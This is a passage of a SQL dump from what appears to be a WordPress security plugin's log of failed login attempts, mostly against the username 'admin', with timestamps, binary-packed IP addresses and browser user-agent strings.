(X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3130,5525,1628937461.760819,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3131,5526,1628937780.665224,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3132,5529,1628938747.559892,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(3133,5530,1628938766.089884,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���kS�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3134,5535,1628940953.677656,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3135,5538,1628942121.167306,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3136,5545,1628950657.508310,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E1��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3137,5547,1628952989.344445,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3138,5548,1628953722.284539,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(3139,5549,1628954950.163120,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3140,5550,1628956359.470894,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(3141,5554,1628958918.937944,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(3142,5556,1628960212.177143,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�-!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3143,5558,1628962039.517304,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���옔','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3144,5562,1628965480.689426,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(3145,5563,1628965762.027948,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3146,5564,1628967589.238299,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3147,5567,1628969422.776667,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.ec','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3148,5569,1628971392.121361,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3149,5571,1628973259.694729,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3150,5571,1628973259.747334,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3151,5572,1628974518.009724,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�M','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(3152,5573,1628975314.395084,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3153,5575,1628977093.526989,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���D�\0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(3154,5576,1628977201.385042,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����7�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3155,5577,1628979305.550685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3156,5579,1628982244.773520,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��vE��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(3157,5580,1628983455.512226,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֖]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3158,5580,1628983455.559727,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֖]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3159,5581,1628985502.179282,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ca�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3160,5582,1628986113.124834,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(3161,5584,1628988715.484176,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(3162,5585,1628989757.115829,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3163,5586,1628990033.943304,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(3164,5586,1628990033.955550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(3165,5587,1628991340.481085,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j\\�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(3166,5588,1628992016.181487,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3167,5589,1628993965.919953,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(3168,5592,1628997864.990151,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ghIo','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(3169,5593,1628998436.905506,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3170,5594,1628999086.251799,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>}�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(3171,5596,1629000309.774065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3172,5600,1629003589.961818,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��R�,�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(3173,5601,1629003889.212146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3174,5605,1629006927.086858,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(3175,5607,1629008050.755973,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3M�\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(3176,5608,1629009177.486562,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(3177,5609,1629009438.299609,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3178,5610,1629010317.121548,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(3179,5613,1629013257.229918,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3180,5615,1629015178.762117,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���oXr','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3181,5617,1629017208.876173,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����l','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(3182,5620,1629021789.394538,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(3183,5625,1629026411.738196,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(3184,5626,1629027350.592651,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e_A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3185,5627,1629027570.387405,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;v�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(3186,5628,1629028722.751196,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(3187,5629,1629029459.404841,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3188,5630,1629031534.112663,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VK�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3189,5632,1629034036.475609,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(3190,5637,1629054060.997396,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Kȷ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(3191,5639,1629057191.492400,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�,&','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(3192,5640,1629060172.304979,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(3193,5641,1629060321.191526,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(3194,5644,1629072341.067870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����d�','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224'),(3195,5645,1629072862.168658,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����gI','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(3196,5650,1629082301.482120,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����}','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(3197,5651,1629085457.937931,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(3198,5654,1629087494.540006,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(3199,5655,1629087495.466458,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(3200,5656,1629087496.304169,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(3201,5657,1629088621.662850,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e ��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(3202,5657,1629088621.709381,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e ��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(3203,5659,1629092302.658915,1,'loginFailInvalidUsername','wordcamp',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(3204,5660,1629094709.357149,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t˖G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(3205,5661,1629097705.833801,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(3206,5662,1629100726.908891,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(3207,5663,1629102969.509151,1,'loginFailInvalidUsername','adminlin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(3208,5664,1629103757.816643,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(3209,5664,1629103757.878426,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(3210,5665,1629106797.389968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vҳ','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(3211,5666,1629109825.514975,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(3212,5671,1629138473.651401,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(3213,5672,1629138477.521091,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(3214,5673,1629138486.610388,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(3215,5676,1629154699.684550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(3216,5677,1629154703.296571,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(3217,5678,1629154710.330656,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(3218,5680,1629184540.641871,1,'loginFailInvalidUsername','adminlin',0,'\0\0\0\0\0\0\0\0\0\0���>�','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(3219,5683,1629221286.500772,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3220,5684,1629221506.729502,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Dp^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3221,5685,1629221701.729972,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3222,5686,1629221902.311979,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�*-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3223,5687,1629222113.618228,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*��U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3224,5688,1629222339.232422,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3225,5689,1629222518.056183,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3226,5690,1629222714.385531,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϔ}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3227,5691,1629222918.228036,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3228,5692,1629222952.941461,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(3229,5693,1629222953.375007,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(3230,5694,1629222953.771553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�ra','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(3231,5695,1629223116.809596,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3232,5696,1629223318.855390,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3233,5697,1629223526.195452,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3234,5698,1629223742.593974,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y�ji','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3235,5698,1629223742.686475,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y�ji','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3236,5699,1629223931.944036,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3237,5700,1629224149.889265,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3238,5701,1629224347.245646,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��*��U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3239,5702,1629224544.145550,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�\"o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3240,5703,1629224745.281670,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0g3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3241,5703,1629224745.292912,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0g3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3242,5704,1629225158.985963,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3243,5705,1629225360.033074,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3244,5706,1629225563.138323,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3245,5707,1629225785.986249,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[L=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3246,5708,1629225970.312752,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3247,5709,1629226175.629210,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3248,5710,1629226393.928368,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��M\\J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3249,5711,1629226587.879777,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�\nj','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3250,5712,1629226795.052633,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@v7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; 